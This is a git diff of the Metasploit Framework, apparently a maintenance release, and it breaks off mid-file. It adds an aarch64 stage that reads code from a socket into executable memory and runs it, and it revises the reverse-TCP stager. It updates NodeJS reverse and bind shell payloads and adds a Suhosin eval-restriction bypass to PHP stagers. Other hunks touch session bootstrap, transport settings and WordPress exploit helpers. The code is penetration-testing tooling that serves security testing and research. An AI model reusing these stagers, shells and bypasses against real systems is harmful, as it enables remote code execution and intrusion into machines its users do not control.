+https://github.com/rapid7/metasploit-payloads diff --git a/external/source/shellcode/linux/aarch64/stage_mettle.s b/external/source/shellcode/linux/aarch64/stage_mettle.s new file mode 100644 index 0000000000..0092c737ef --- /dev/null +++ b/external/source/shellcode/linux/aarch64/stage_mettle.s @@ -0,0 +1,98 @@ +.equ SYS_READ, 0x3f +.equ SYS_MMAP, 0xde +.equ SYS_EXIT, 0x5d + +start: + adr x2, size + ldr w2, [x2] + mov x10, x2 + + /* Page-align, assume <4GB */ + lsr x2, x2, #12 + add x2, x2, #1 + lsl x2, x2, #12 + + /* mmap(addr=0, length='x2', prot=7, flags=34, fd=0, offset=0) */ + mov x0, xzr + mov x1, x2 + mov x2, #7 + mov x3, #34 + mov x4, xzr + mov x5, xzr + mov x8, SYS_MMAP + svc 0 + + /* Grab the saved size, save the address */ + mov x4, x10 + + /* Save the memory address */ + mov x3, x0 + mov x10, x0 + +read_loop: + /* read(sockfd, buf='x3', nbytes='x4') */ + mov x0, x12 + mov x1, x3 + mov x2, x4 + mov x8, SYS_READ + svc 0 + cbz w0, failed + add x3, x3, x0 + subs x4, x4, x0 + bne read_loop + + /* add entry_offset */ + adr x0, entry + ldr x0, [x0] + add x0, x0, x10 + mov x14, x0 + + /* set up the initial stack */ + mov x0, sp + and sp, x0, #-16 + add sp, sp, #(16 * 6) + + /* argc = 2, argv[0] = 'm' */ + mov x0, #2 + mov x1, #109 + str x1, [sp] + mov x1, sp + + mov x2, x12 + mov x3, 0 + + mov x4, 0 + mov x5, #7 /* AT_BASE */ + + mov x6, x10 + mov x7, #6 /* AT_PAGESZ */ + + mov x8, #0x1000 + mov x9, #25 /* AT_RANDOM */ + + mov x10, x10 + mov x11, #0 /* AT_NULL */ + + stp x10, x11, [sp, #-16]! + stp x8, x9, [sp, #-16]! + stp x6, x7, [sp, #-16]! + stp x4, x5, [sp, #-16]! + stp x2, x3, [sp, #-16]! + stp x0, x1, [sp, #-16]! + + mov x29, #0 + mov x30, #0 + br x14 + +failed: + mov x0, 0 + mov x8, SYS_EXIT + svc 0 + +.balign 16 +size: + .word 0 + .word 0 +entry: + .word 0 + .word 0 diff --git a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s index 7c049b8308..f8b354fbc5 100644 --- a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s +++ b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s @@ -37,9 +37,10 @@ start: mov x2, #4 mov x8, SYS_READ svc 0 - cbz w0, failed + cmn x0, #0x1 + beq failed - ldr x2, [sp,#0] + ldr w2, [sp,#0] /* Page-align, assume <4GB */ lsr x2, x2, #12 @@ -53,12 +54,13 @@ start: mov x3, #34 mov x4, xzr mov x5, xzr - /* call mmap() */ - movi x8, SYS_MMAP + mov x8, SYS_MMAP svc 0 + cmn x0, #0x1 + beq failed /* Grab the saved size, save the address */ - ldr x4, [sp] + ldr w4, [sp] /* Save the memory address */ str x0, [sp] @@ -73,13 +75,15 @@ read_loop: mov x2, x4 mov x8, SYS_READ svc 0 + cmn x0, #0x1 + beq failed add x3, x3, x0 subs x4, x4, x0 bne read_loop /* Go to shellcode */ - ldr x30, [sp] - ret + ldr x0, [sp] + blr x0 failed: mov x0, 0 diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 9c062275bb..96d0b07868 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.16.0" + VERSION = "4.16.9" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb index d404504a51..eca7b90851 100644 --- a/lib/msf/base/serializer/readable_text.rb +++ b/lib/msf/base/serializer/readable_text.rb @@ -582,7 +582,7 @@ class ReadableText row << 'N' end - if session.exploit_datastore.has_key?('LURI') && !session.exploit_datastore['LURI'].empty? + if session.exploit_datastore && session.exploit_datastore.has_key?('LURI') && !session.exploit_datastore['LURI'].empty? row << " (#{session.exploit_datastore['LURI']})" else row << '?' @@ -622,7 +622,7 @@ class ReadableText sess_type = session.type.to_s sess_uuid = session.payload_uuid.to_s sess_puid = session.payload_uuid.respond_to?(:puid_hex) ? session.payload_uuid.puid_hex : nil - sess_luri = session.exploit_datastore['LURI'] || "" + sess_luri = session.exploit_datastore['LURI'] || "" if session.exploit_datastore sess_enc = false if session.respond_to?(:tlv_enc_key) && session.tlv_enc_key && session.tlv_enc_key[:key] sess_enc = true @@ -655,7 +655,7 @@ class ReadableText out << " UUID: #{sess_uuid}\n" out << " CheckIn: #{sess_checkin}\n" out << " Registered: #{sess_registration}\n" - unless sess_luri.empty? + unless (sess_luri || '').empty? out << " LURI: #{sess_luri}\n" end diff --git a/lib/msf/base/sessions/hwbridge.rb b/lib/msf/base/sessions/hwbridge.rb index 171d8b9464..e04e7609ed 100644 --- a/lib/msf/base/sessions/hwbridge.rb +++ b/lib/msf/base/sessions/hwbridge.rb @@ -196,6 +196,10 @@ class HWBridge < Rex::Post::HWBridge::Client attr_accessor :console # :nodoc: attr_accessor :alive # :nodoc: + attr_accessor :api_version + attr_accessor :fw_version + attr_accessor :hw_version + attr_accessor :device_name private attr_accessor :rstream # :nodoc: diff --git a/lib/msf/base/sessions/meterpreter.rb b/lib/msf/base/sessions/meterpreter.rb index d17ee6edd7..110e1fef3d 100644 --- a/lib/msf/base/sessions/meterpreter.rb +++ b/lib/msf/base/sessions/meterpreter.rb @@ -40,6 +40,14 @@ class Meterpreter < Rex::Post::Meterpreter::Client true end + def tunnel_to_s + if self.pivot_session + "Pivot via [#{self.pivot_session.tunnel_to_s}]" + else + super + end + end + # # Initializes a meterpreter session instance using the supplied rstream # that is to be used as the client's connection to the server. @@ -112,6 +120,80 @@ class Meterpreter < Rex::Post::Meterpreter::Client end + def bootstrap(datastore = {}, handler = nil) + session = self + + init_session = Proc.new do + # Configure unicode encoding before loading stdapi + session.encode_unicode = datastore['EnableUnicodeEncoding'] + + session.init_ui(self.user_input, self.user_output) + + session.tlv_enc_key = session.core.negotiate_tlv_encryption + + unless datastore['AutoVerifySession'] == false + unless session.is_valid_session?(datastore['AutoVerifySessionTimeout'].to_i) + print_error("Meterpreter session #{session.sid} is not valid and will be closed") + # Terminate the session without cleanup if it did not validate + session.skip_cleanup = true + session.kill + return nil + end + end + + # always make sure that the new session has a new guid if it's not already known + guid = session.session_guid + if guid == "\x00" * 16 + guid = [SecureRandom.uuid.gsub(/-/, '')].pack('H*') + session.core.set_session_guid(guid) + session.session_guid = guid + # TODO: New statgeless session, do some account in the DB so we can track it later. + else + # TODO: This session was either staged or previously known, and so we shold do some accounting here! + end + + unless datastore['AutoLoadStdapi'] == false + + session.load_stdapi + + unless datastore['AutoSystemInfo'] == false + session.load_session_info + end + + # only load priv on native windows + # TODO: abastrct this too, to remove windows stuff + if session.platform == 'windows' && [ARCH_X86, ARCH_X64].include?(session.arch) + session.load_priv rescue nil + end + end + + # TODO: abstract this a little, perhaps a "post load" function that removes + # platform-specific stuff? + if session.platform == 'android' + session.load_android + end + + ['InitialAutoRunScript', 'AutoRunScript'].each do |key| + unless datastore[key].nil? || datastore[key].empty? + args = Shellwords.shellwords(datastore[key]) + print_status("Session ID #{session.sid} (#{session.tunnel_to_s}) processing #{key} '#{datastore[key]}'") + session.execute_script(args.shift, *args) + end + end + + # Process the auto-run scripts for this session + if self.respond_to?(:process_autoruns) + self.process_autoruns(datastore) + end + + # Tell the handler that we have a session + handler.on_session(self) if handler + end + + # Defer the session initialization to the Session Manager scheduler + framework.sessions.schedule init_session + end + ## # :category: Msf::Session::Provider::SingleCommandShell implementors # @@ -255,14 +337,14 @@ class Meterpreter < Rex::Post::Meterpreter::Client # # Terminates the session # - def kill + def kill(reason='') begin cleanup_meterpreter self.sock.close if self.sock rescue ::Exception end # deregister will actually trigger another cleanup - framework.sessions.deregister(self) + framework.sessions.deregister(self, reason) end # diff --git a/lib/msf/base/sessions/meterpreter_options.rb b/lib/msf/base/sessions/meterpreter_options.rb index 7c785906ac..09c8a97eff 100644 --- a/lib/msf/base/sessions/meterpreter_options.rb +++ b/lib/msf/base/sessions/meterpreter_options.rb @@ -3,105 +3,74 @@ require 'shellwords' module Msf -module Sessions -module MeterpreterOptions + module Sessions + # + # Defines common options across all Meterpreter implementations + # + module MeterpreterOptions - def initialize(info = {}) - super(info) + TIMEOUT_SESSION = 24 * 3600 * 7 # 1 week + TIMEOUT_COMMS = 300 # 5 minutes + TIMEOUT_RETRY_TOTAL = 60 * 60 # 1 hour + TIMEOUT_RETRY_WAIT = 10 # 10 seconds - register_advanced_options( - [ - OptBool.new('AutoLoadStdapi', [true, "Automatically load the Stdapi extension", true]), - OptBool.new('AutoVerifySession', [true, "Automatically verify and drop invalid sessions", true]), - OptInt.new('AutoVerifySessionTimeout', [false, "Timeout period to wait for session validation to occur, in seconds", 30]), - OptString.new('InitialAutoRunScript', [false, "An initial script to run on session creation (before AutoRunScript)", '']), - OptString.new('AutoRunScript', [false, "A script to run automatically on session creation.", '']), - OptBool.new('AutoSystemInfo', [true, "Automatically capture system information on initialization.", true]), - OptBool.new('EnableUnicodeEncoding', [true, "Automatically encode UTF-8 strings as hexadecimal", Rex::Compat.is_windows]), - OptPath.new('HandlerSSLCert', [false, "Path to a SSL certificate in unified PEM format, ignored for HTTP transports"]), - OptInt.new('SessionRetryTotal', [false, "Number of seconds try reconnecting for on network failure", Rex::Post::Meterpreter::ClientCore::TIMEOUT_RETRY_TOTAL]), - OptInt.new('SessionRetryWait', [false, "Number of seconds to wait between reconnect attempts", Rex::Post::Meterpreter::ClientCore::TIMEOUT_RETRY_WAIT]), - OptInt.new('SessionExpirationTimeout', [ false, 'The number of seconds before this session should be forcibly shut down', Rex::Post::Meterpreter::ClientCore::TIMEOUT_SESSION]), - OptInt.new('SessionCommunicationTimeout', [ false, 'The number of seconds of no activity before this session should be killed', Rex::Post::Meterpreter::ClientCore::TIMEOUT_COMMS]) - ], self.class) + def initialize(info = {}) + super(info) + + register_advanced_options( + [ + OptBool.new( + 'AutoLoadStdapi', + [true, "Automatically load the Stdapi extension", true] + ), + OptBool.new( + 'AutoVerifySession', + [true, "Automatically verify and drop invalid sessions", true] + ), + OptInt.new( + 'AutoVerifySessionTimeout', + [false, "Timeout period to wait for session validation to occur, in seconds", 30] + ), + OptString.new( + 'InitialAutoRunScript', + [false, "An initial script to run on session creation (before AutoRunScript)", ''] + ), + OptString.new( + 'AutoRunScript', + [false, "A script to run automatically on session creation.", ''] + ), + OptBool.new( + 'AutoSystemInfo', + [true, "Automatically capture system information on initialization.", true] + ), + OptBool.new( + 'EnableUnicodeEncoding', + [true, "Automatically encode UTF-8 strings as hexadecimal", Rex::Compat.is_windows] + ), + OptPath.new( + 'HandlerSSLCert', + [false, "Path to a SSL certificate in unified PEM format, ignored for HTTP transports"] + ), + OptInt.new( + 'SessionRetryTotal', + [false, "Number of seconds try reconnecting for on network failure", TIMEOUT_RETRY_TOTAL] + ), + OptInt.new( + 'SessionRetryWait', + [false, "Number of seconds to wait between reconnect attempts", TIMEOUT_RETRY_WAIT] + ), + OptInt.new( + 'SessionExpirationTimeout', + [ false, 'The number of seconds before this session should be forcibly shut down', TIMEOUT_SESSION] + ), + OptInt.new( + 'SessionCommunicationTimeout', + [ false, 'The number of seconds of no activity before this session should be killed', TIMEOUT_COMMS] + ) + ], + self.class + ) + end + end end - - # - # Once a session is created, automatically load the stdapi extension if the - # advanced option is set to true. - # - def on_session(session) - super - - # Defer the session initialization to the Session Manager scheduler - framework.sessions.schedule Proc.new { - - # Configure unicode encoding before loading stdapi - session.encode_unicode = datastore['EnableUnicodeEncoding'] - - session.init_ui(self.user_input, self.user_output) - - valid = true - - session.tlv_enc_key = session.core.negotiate_tlv_encryption - - if datastore['AutoVerifySession'] - if not session.is_valid_session?(datastore['AutoVerifySessionTimeout'].to_i) - print_error("Meterpreter session #{session.sid} is not valid and will be closed") - valid = false - end - end - - if valid - # always make sure that the new session has a new guid if it's not already known - guid = session.session_guid - if guid == '00000000-0000-0000-0000-000000000000' - guid = SecureRandom.uuid - session.core.set_session_guid(guid) - session.session_guid = guid - # TODO: New statgeless session, do some account in the DB so we can track it later. - else - # TODO: This session was either staged or previously known, and so we shold do some accounting here! - end - - if datastore['AutoLoadStdapi'] - - session.load_stdapi - - if datastore['AutoSystemInfo'] - session.load_session_info - end - - # only load priv on native windows - if session.platform == 'windows' && [ARCH_X86, ARCH_X64].include?(session.arch) - session.load_priv rescue nil - end - end - - if session.platform == 'android' - session.load_android - end - - [ 'InitialAutoRunScript', 'AutoRunScript' ].each do |key| - unless datastore[key].empty? - args = Shellwords.shellwords( datastore[key] ) - print_status("Session ID #{session.sid} (#{session.tunnel_to_s}) processing #{key} '#{datastore[key]}'") - session.execute_script(args.shift, *args) - end - end - end - - # Terminate the session without cleanup if it did not validate - if not valid - session.skip_cleanup = true - session.kill - end - - } - - end - end -end -end - diff --git a/lib/msf/core/auxiliary/login.rb b/lib/msf/core/auxiliary/login.rb index 5c8efdade8..b866b5091f 100644 --- a/lib/msf/core/auxiliary/login.rb +++ b/lib/msf/core/auxiliary/login.rb @@ -44,6 +44,7 @@ module Auxiliary::Login Unable | Error | Denied | Reject | Refuse | Close | Closing | %\ Bad | Sorry | + ^http | html | Not\ on\ system\ console | Enter\ username\ and\ password | Auto\ Apply\ On | diff --git a/lib/msf/core/auxiliary/udp_scanner.rb b/lib/msf/core/auxiliary/udp_scanner.rb index 6f828f8276..c453115864 100644 --- a/lib/msf/core/auxiliary/udp_scanner.rb +++ b/lib/msf/core/auxiliary/udp_scanner.rb @@ -43,18 +43,20 @@ module Auxiliary::UDPScanner datastore['BATCHSIZE'].to_i end - def udp_socket(ip, port) + def udp_socket(ip, port, bind_peer: true) + key = "#{ip}:#{port}:#{bind_peer ? 'bound' : 'unbound'}" @udp_sockets_mutex.synchronize do - key = "#{ip}:#{port}" unless @udp_sockets.key?(key) - @udp_sockets[key] = - Rex::Socket::Udp.create({ - 'LocalHost' => datastore['CHOST'] || nil, - 'LocalPort' => datastore['CPORT'] || 0, - 'PeerHost' => ip, - 'PeerPort' => port, - 'Context' => { 'Msf' => framework, 'MsfExploit' => self } - }) + sock_info = { + 'LocalHost' => datastore['CHOST'] || nil, + 'LocalPort' => datastore['CPORT'] || 0, + 'Context' => { 'Msf' => framework, 'MsfExploit' => self } + } + if bind_peer + sock_info['PeerHost'] = ip + sock_info['PeerPort'] = port + end + @udp_sockets[key] = Rex::Socket::Udp.create(sock_info) add_socket(@udp_sockets[key]) end return @udp_sockets[key] @@ -123,10 +125,16 @@ module Auxiliary::UDPScanner data = data.to_binary_s if data.respond_to?('to_binary_s') resend_count = 0 - sock = nil + begin - sock = udp_socket(ip, port) - sock.send(data, 0) + addrinfo = Addrinfo.ip(ip) + unless addrinfo.ipv4_multicast? || addrinfo.ipv6_multicast? + sock = udp_socket(ip, port, bind_peer: true) + sock.send(data, 0) + else + sock = udp_socket(ip, port, bind_peer: false) + sock.sendto(data, ip, port, 0) + end rescue ::Errno::ENOBUFS resend_count += 1 @@ -136,8 +144,7 @@ module Auxiliary::UDPScanner end scanner_recv(0.1) - - ::IO.select(nil, nil, nil, 0.25) + sleep(0.25) retry diff --git a/lib/msf/core/db_manager/import/nessus/xml/v2.rb b/lib/msf/core/db_manager/import/nessus/xml/v2.rb index 00822d03b7..c17934074f 100644 --- a/lib/msf/core/db_manager/import/nessus/xml/v2.rb +++ b/lib/msf/core/db_manager/import/nessus/xml/v2.rb @@ -74,7 +74,7 @@ module Msf::DBManager::Import::Nessus::XML::V2 nasl = item['nasl'].to_s nasl_name = item['nasl_name'].to_s port = item['port'].to_s - proto = item['proto'] || "tcp" + proto = item['proto'] ? item['proto'].downcase : "tcp" sname = item['svc_name'] severity = item['severity'] description = item['description'] diff --git a/lib/msf/core/exploit/http/wordpress/helpers.rb b/lib/msf/core/exploit/http/wordpress/helpers.rb index 206b0364c7..f938620420 100644 --- a/lib/msf/core/exploit/http/wordpress/helpers.rb +++ b/lib/msf/core/exploit/http/wordpress/helpers.rb @@ -10,12 +10,12 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers # @param pass [String] Password # @param redirect URL [String] to redirect after successful login # @return [Hash] The post data for vars_post Parameter - def wordpress_helper_login_post_data(user, pass, redirect=nil) + def wordpress_helper_login_post_data(user, pass, redirect = nil) post_data = { - 'log' => user.to_s, - 'pwd' => pass.to_s, - 'redirect_to' => redirect.to_s, - 'wp-submit' => 'Login' + 'log' => user.to_s, + 'pwd' => pass.to_s, + 'redirect_to' => redirect.to_s, + 'wp-submit' => 'Login' } post_data end @@ -31,23 +31,23 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers # @return [String,nil] The location of the new comment/post, nil on error def wordpress_helper_post_comment(comment, comment_post_id, login_cookie, author, email, url) vars_post = { - 'comment' => comment, - 'submit' => 'Post+Comment', - 'comment_post_ID' => comment_post_id.to_s, - 'comment_parent' => '0' + 'comment' => comment, + 'submit' => 'Post+Comment', + 'comment_post_ID' => comment_post_id.to_s, + 'comment_parent' => '0' } vars_post.merge!({ - 'author' => author, - 'email' => email, - 'url' => url, + 'author' => author, + 'email' => email, + 'url' => url }) unless login_cookie options = { - 'uri' => normalize_uri(target_uri.path, 'wp-comments-post.php'), - 'method' => 'POST' + 'uri' => normalize_uri(target_uri.path, 'wp-comments-post.php'), + 'method' => 'POST' } - options.merge!({'vars_post' => vars_post}) - options.merge!({'cookie' => login_cookie}) if login_cookie + options.merge!({ 'vars_post' => vars_post }) + options.merge!({ 'cookie' => login_cookie }) if login_cookie res = send_request_cgi(options) if res && res.redirect? && res.redirection return wordpress_helper_parse_location_header(res) @@ -65,7 +65,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers # @param comments_enabled [Boolean] If true try to find a post id with comments enabled, otherwise return the first found # @param login_cookie [String] A valid login cookie to perform the bruteforce as an authenticated user # @return [Integer,nil] The post id, nil when nothing found - def wordpress_helper_bruteforce_valid_post_id(range, comments_enabled=false, login_cookie=nil) + def wordpress_helper_bruteforce_valid_post_id(range, comments_enabled = false, login_cookie = nil) range.each { |id| vprint_status("Checking POST ID #{id}...") if (id % 100) == 0 body = wordpress_helper_check_post_id(wordpress_url_post(id), comments_enabled, login_cookie) @@ -81,15 +81,15 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers # @param comments_enabled [Boolean] Check if comments are enabled on this post # @param login_cookie [String] A valid login cookie to perform the check as an authenticated user # @return [String,nil] the HTTP response body of the post, nil otherwise - def wordpress_helper_check_post_id(uri, comments_enabled=false, login_cookie=nil) + def wordpress_helper_check_post_id(uri, comments_enabled = false, login_cookie = nil) options = { - 'method' => 'GET', - 'uri' => uri + 'method' => 'GET', + 'uri' => uri } - options.merge!({'cookie' => login_cookie}) if login_cookie + options.merge!({ 'cookie' => login_cookie }) if login_cookie res = send_request_cgi(options) # post exists - if res and res.code == 200 + if res && res.code == 200 # also check if comments are enabled if comments_enabled if res.body =~ /form.*action.*wp-comments-post\.php/ @@ -123,8 +123,8 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers # # @param cookie [String] A valid admin session cookie # @return [String,nil] The nonce, nil on error - def wordpress_helper_get_plugin_upload_nonce(cookie) - uri = normalize_uri(wordpress_url_backend, 'plugin-install.php') + def wordpress_helper_get_plugin_upload_nonce(cookie, path = nil) + uri = path || normalize_uri(wordpress_url_backend, 'plugin-install.php') options = { 'method' => 'GET', 'uri' => uri, @@ -134,6 +134,9 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers res = send_request_cgi(options) if res && res.code == 200 return res.body.to_s[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1] + elsif res && res.redirect? && res.redirection + path = wordpress_helper_parse_location_header(res) + return wordpress_helper_get_plugin_upload_nonce(cookie, path) end end end diff --git a/lib/msf/core/handler.rb b/lib/msf/core/handler.rb index bbd899a0e0..9f39bfc922 100644 --- a/lib/msf/core/handler.rb +++ b/lib/msf/core/handler.rb @@ -244,11 +244,10 @@ protected framework.sessions.register(session) # Call the handler's on_session() method - on_session(session) - - # Process the auto-run scripts for this session - if session.respond_to?('process_autoruns') - session.process_autoruns(datastore) + if session.respond_to?(:bootstrap) + session.bootstrap(datastore, self) + else + on_session(session) end # If there is an exploit associated with this payload, then let's notify diff --git a/lib/msf/core/handler/reverse_named_pipe.rb b/lib/msf/core/handler/reverse_named_pipe.rb new file mode 100644 index 0000000000..51573e9c8b --- /dev/null +++ b/lib/msf/core/handler/reverse_named_pipe.rb @@ -0,0 +1,76 @@ +# -*- coding: binary -*- +require 'thread' +require 'msf/core/post_mixin' + +module Msf +module Handler +### +# +# TODO: docs +# +### +module ReverseNamedPipe + + include Msf::Handler + + # + # Returns the string representation of the handler type, in this case + # 'reverse_named_pipe'. + # + def self.handler_type + "reverse_named_pipe" + end + + # + # Returns the connection-described general handler type, in this case + # 'reverse'. + # + def self.general_handler_type + "reverse" + end + + # + # Initializes the reverse handler and ads the options that are required + # for reverse named pipe payloads. + # + def initialize(info={}) + super + + register_options([ + OptString.new('PIPENAME', [true, 'Name of the pipe to listen on', 'msf-pipe']), + OptString.new('PIPEHOST', [true, 'Host of the pipe to connect to', '.']) + ], Msf::Handler::ReverseNamedPipe) + end + + # + # Closes the listener socket if one was created. + # + def cleanup_handler + # we're just pretending to be a handler + end + + # A string suitable for displaying to the user + # + # @return [String] + def human_name + "reverse named pipe" + end + + # + # Starts monitoring for an inbound connection. + # + def start_handler + # we're just pretending to be a handler + end + + # + # Stops monitoring for an inbound connection. + # + def stop_handler + # we're just pretending to be a handler + end + +end +end +end + diff --git a/lib/msf/core/module/platform.rb b/lib/msf/core/module/platform.rb index 8fe2e8b217..90f82c3bd5 100644 --- a/lib/msf/core/module/platform.rb +++ b/lib/msf/core/module/platform.rb @@ -352,6 +352,14 @@ class Msf::Module::Platform Alias = "java" end + # + # R + # + class R < Msf::Module::Platform + Rank = 100 + Alias = "r" + end + # # Ruby # diff --git a/lib/msf/core/payload/apk.rb b/lib/msf/core/payload/apk.rb index bb7d04ae8b..cddbee7108 100644 --- a/lib/msf/core/payload/apk.rb +++ b/lib/msf/core/payload/apk.rb @@ -41,7 +41,10 @@ class Msf::Payload::Apk application = amanifest.xpath('//application') application_name = application.attribute("name") if application_name - return application_name.to_s + application_str = application_name.to_s + unless application_str == 'android.app.Application' + return application_str + end end activities = amanifest.xpath("//activity|//activity-alias") for activity in activities @@ -221,7 +224,7 @@ class Msf::Payload::Apk FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali") package = amanifest.xpath("//manifest").first['package'] - package = package + ".#{Rex::Text::rand_text_alpha_lower(5)}" + package = package.downcase + ".#{Rex::Text::rand_text_alpha_lower(5)}" classes = {} classes['Payload'] = Rex::Text::rand_text_alpha_lower(5).capitalize classes['MainService'] = Rex::Text::rand_text_alpha_lower(5).capitalize diff --git a/lib/msf/core/payload/linux/bind_tcp.rb b/lib/msf/core/payload/linux/bind_tcp.rb index cc7fbc7b02..d630bf749e 100644 --- a/lib/msf/core/payload/linux/bind_tcp.rb +++ b/lib/msf/core/payload/linux/bind_tcp.rb @@ -31,7 +31,7 @@ module Payload::Linux::BindTcp # Generate the more advanced stager if we have the space if self.available_space && required_space <= self.available_space - conf[:exitfunk] = datastore['EXITFUNC'], + conf[:exitfunk] = datastore['EXITFUNC'] conf[:reliable] = true end diff --git a/lib/msf/core/payload/nodejs.rb b/lib/msf/core/payload/nodejs.rb index 3ae0de1ab3..1787080721 100644 --- a/lib/msf/core/payload/nodejs.rb +++ b/lib/msf/core/payload/nodejs.rb @@ -18,8 +18,13 @@ module Msf::Payload::NodeJS var server = net.createServer(function(socket) { var sh = cp.spawn(cmd, []); socket.pipe(sh.stdin); - util.pump(sh.stdout, socket); - util.pump(sh.stderr, socket); + if (typeof util.pump === "undefined") { + sh.stdout.pipe(client.socket); + sh.stderr.pipe(client.socket); + } else { + util.pump(sh.stdout, client.socket); + util.pump(sh.stderr, client.socket); + } }); server.listen(#{datastore['LPORT']}); })(); @@ -53,8 +58,13 @@ module Msf::Payload::NodeJS var client = this; client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() { client.socket.pipe(sh.stdin); - util.pump(sh.stdout, client.socket); - util.pump(sh.stderr, client.socket); + if (typeof util.pump === "undefined") { + sh.stdout.pipe(client.socket); + sh.stderr.pipe(client.socket); + } else { + util.pump(sh.stdout, client.socket); + util.pump(sh.stderr, client.socket); + } }); })(); EOS diff --git a/lib/msf/core/payload/php/bind_tcp.rb b/lib/msf/core/payload/php/bind_tcp.rb index 4756ce810d..7dac6fe441 100644 --- a/lib/msf/core/payload/php/bind_tcp.rb +++ b/lib/msf/core/payload/php/bind_tcp.rb @@ -109,7 +109,15 @@ while (strlen($b) < $len) { # Set up the socket for the main stage to use. $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; -eval($b); +if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) +{ + $suhosin_bypass=create_function('', $b); + $suhosin_bypass(); +} +else +{ + eval($b); +} die();^ end diff --git a/lib/msf/core/payload/php/reverse_tcp.rb b/lib/msf/core/payload/php/reverse_tcp.rb index aa480610c6..5cc7daae8c 100644 --- a/lib/msf/core/payload/php/reverse_tcp.rb +++ b/lib/msf/core/payload/php/reverse_tcp.rb @@ -102,7 +102,15 @@ while (strlen($b) < $len) { # Set up the socket for the main stage to use. $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; -eval($b); +if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) +{ + $suhosin_bypass=create_function('', $b); + $suhosin_bypass(); +} +else +{ + eval($b); +} die();^ end diff --git a/lib/msf/core/payload/stager.rb b/lib/msf/core/payload/stager.rb index 699e884714..1f2ff91aaf 100644 --- a/lib/msf/core/payload/stager.rb +++ b/lib/msf/core/payload/stager.rb @@ -165,8 +165,6 @@ module Msf::Payload::Stager # If the stage should be sent over the client connection that is # established (which is the default), then go ahead and transmit it. if (stage_over_connection?) - opts = {} - if respond_to? :include_send_uuid if include_send_uuid uuid_raw = conn.get_once(16, 1) diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb index 3eb12a7037..c59c85577e 100644 --- a/lib/msf/core/payload/transport_config.rb +++ b/lib/msf/core/payload/transport_config.rb @@ -11,31 +11,35 @@ module Msf::Payload::TransportConfig include Msf::Payload::UUID::Options def transport_config_reverse_tcp(opts={}) + ds = opts[:datastore] || datastore config = transport_config_bind_tcp(opts) - config[:lhost] = datastore['LHOST'] + config[:lhost] = ds['LHOST'] config end def transport_config_reverse_ipv6_tcp(opts={}) + ds = opts[:datastore] || datastore config = transport_config_reverse_tcp(opts) config[:scheme] = 'tcp6' - config[:scope_id] = datastore['SCOPEID'] + config[:scope_id] = ds['SCOPEID'] config end def transport_config_bind_tcp(opts={}) + ds = opts[:datastore] || datastore { scheme: 'tcp', - lhost: datastore['LHOST'], - lport: datastore['LPORT'].to_i - }.merge(timeout_config) + lhost: ds['LHOST'], + lport: ds['LPORT'].to_i + }.merge(timeout_config(opts)) end def transport_config_reverse_https(opts={}) + ds = opts[:datastore] || datastore config = transport_config_reverse_http(opts) - config[:scheme] = datastore['OverrideScheme'] || 'https' - config[:ssl_cert_hash] = get_ssl_cert_hash(datastore['StagerVerifySSLCert'], - datastore['HandlerSSLCert']) + config[:scheme] = ds['OverrideScheme'] || 'https' + config[:ssl_cert_hash] = get_ssl_cert_hash(ds['StagerVerifySSLCert'], + ds['HandlerSSLCert']) config end @@ -50,27 +54,38 @@ module Msf::Payload::TransportConfig uri = luri + generate_uri_uuid(sum, opts[:uuid]) end + ds = opts[:datastore] || datastore { - scheme: datastore['OverrideScheme'] || 'http', - lhost: opts[:lhost] || datastore['LHOST'], - lport: (opts[:lport] || datastore['LPORT']).to_i, + scheme: ds['OverrideScheme'] || 'http', + lhost: opts[:lhost] || ds['LHOST'], + lport: (opts[:lport] || ds['LPORT']).to_i, uri: uri, - ua: datastore['MeterpreterUserAgent'], - proxy_host: datastore['PayloadProxyHost'], - proxy_port: datastore['PayloadProxyPort'], - proxy_type: datastore['PayloadProxyType'], - proxy_user: datastore['PayloadProxyUser'], - proxy_pass: datastore['PayloadProxyPass'] - }.merge(timeout_config) + ua: ds['MeterpreterUserAgent'], + proxy_host: ds['PayloadProxyHost'], + proxy_port: ds['PayloadProxyPort'], + proxy_type: ds['PayloadProxyType'], + proxy_user: ds['PayloadProxyUser'], + proxy_pass: ds['PayloadProxyPass'] + }.merge(timeout_config(opts)) + end + + def transport_config_reverse_named_pipe(opts={}) + ds = opts[:datastore] || datastore + { + scheme: 'pipe', + lhost: ds[:pipe_host] || ds['PIPEHOST'], + uri: "/#{ds[:pipe_host] || ds['PIPENAME']}" + }.merge(timeout_config(opts)) end private - def timeout_config + def timeout_config(opts={}) + ds = opts[:datastore] || datastore { - comm_timeout: datastore['SessionCommunicationTimeout'].to_i, - retry_total: datastore['SessionRetryTotal'].to_i, - retry_wait: datastore['SessionRetryWait'].to_i + comm_timeout: (ds[:comm_timeout] || ds['SessionCommunicationTimeout']).to_i, + retry_total: (ds[:retry_total] || ds['SessionRetryTotal']).to_i, + retry_wait: (ds[:retry_wait] || ds['SessionRetryWait']).to_i } end diff --git a/lib/msf/core/payload/windows/bind_tcp.rb b/lib/msf/core/payload/windows/bind_tcp.rb index 63b9a5d651..8945ded6bb 100644 --- 